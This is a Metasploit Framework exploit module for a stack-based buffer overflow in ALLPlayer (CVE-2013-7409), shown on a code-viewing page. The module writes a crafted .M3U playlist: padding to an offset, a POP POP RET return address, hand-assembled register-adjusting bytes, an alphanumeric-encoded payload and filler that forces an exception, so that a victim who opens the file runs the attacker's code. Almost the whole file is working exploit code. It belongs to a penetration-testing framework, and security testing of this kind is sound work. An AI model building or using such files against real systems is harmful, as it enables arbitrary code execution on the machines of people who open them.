Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::FILEFORMAT

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'ALLPlayer M3U Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack-based buffer overflow vulnerability in

18
          ALLPlayer 5.8.1, caused by a long string in a playlist entry.

19
          By persuading the victim to open a specially-crafted .M3U file, a

20
          remote attacker could execute arbitrary code on the system or cause

21
          the application to crash. This module has been tested successfully on

22
          Windows 7 SP1.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'metacom', # Vulnerability discovery

27
          'Mike Czumak',  # Original exploit

28
          'Gabor Seljan'  # Metasploit module

29
        ],

30
        'References' => [

31
          [ 'CVE', '2013-7409' ],

32
          [ 'BID', '62926' ],

33
          [ 'BID', '63896' ],

34
          [ 'EDB', '28855' ],

35
          [ 'EDB', '29549' ],

36
          [ 'EDB', '29798' ],

37
          [ 'EDB', '32041' ],

38
          [ 'OSVDB', '98283' ],

39
          [ 'URL', 'http://www.allplayer.org/' ]

40
        ],

41
        'DefaultOptions' => {

42
          'EXITFUNC' => 'thread'

43
        },

44
        'Platform' => 'win',

45
        'Payload' => {

46
          'DisableNops' => true,

47
          'BadChars' => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",

48
          'Space' => 3060,

49
          'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,

50
          'EncoderOptions' =>

51
              {

52
                'BufferRegister' => 'EAX'

53
              }

54
        },

55
        'Targets' => [

56
          [

57
            ' ALLPlayer 2.8.1 / Windows 7 SP1',

58
            {

59
              'Offset' => 301,

60
              'Ret' => "\x50\x45",  # POP POP RET from ALLPlayer.exe

61
              'Nop' => "\x6e"       # ADD BYTE PTR DS:[ESI],CH

62
            }

63
          ]

64
        ],

65
        'Privileged' => false,

66
        'DisclosureDate' => '2013-10-09',

67
        'DefaultTarget' => 0,

68
        'Notes' => {

69
          'Reliability' => UNKNOWN_RELIABILITY,

70
          'Stability' => UNKNOWN_STABILITY,

71
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

72
        }

73
      )

74
    )

75


76
    register_options(

77
      [

78
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])

79
      ],

80
      self.class

81
    )

82
  end

83


84
  def exploit

85
    nop = target['Nop']

86


87
    sploit = rand_text_alpha_upper(target['Offset'])

88
    sploit << "\x61\x50"      # POPAD

89
    sploit << target.ret

90
    sploit << "\x53"          # PUSH EBX

91
    sploit << nop

92
    sploit << "\x58"          # POP EAX

93
    sploit << nop

94
    sploit << "\x05\x14\x11"  # ADD EAX,0x11001400

95
    sploit << nop

96
    sploit << "\x2d\x13\x11"  # SUB EAX,0x11001300

97
    sploit << nop

98
    sploit << "\x50"          # PUSH EAX

99
    sploit << nop

100
    sploit << "\xc3"          # RET

101
    sploit << nop * 109

102
    sploit << payload.encoded

103
    sploit << rand_text_alpha_upper(10000) # Generate exception

104


105
    # Create the file

106
    print_status("Creating '#{datastore['FILENAME']}' file ...")

107
    file_create("http://" + sploit)

108
  end

109
end

110


111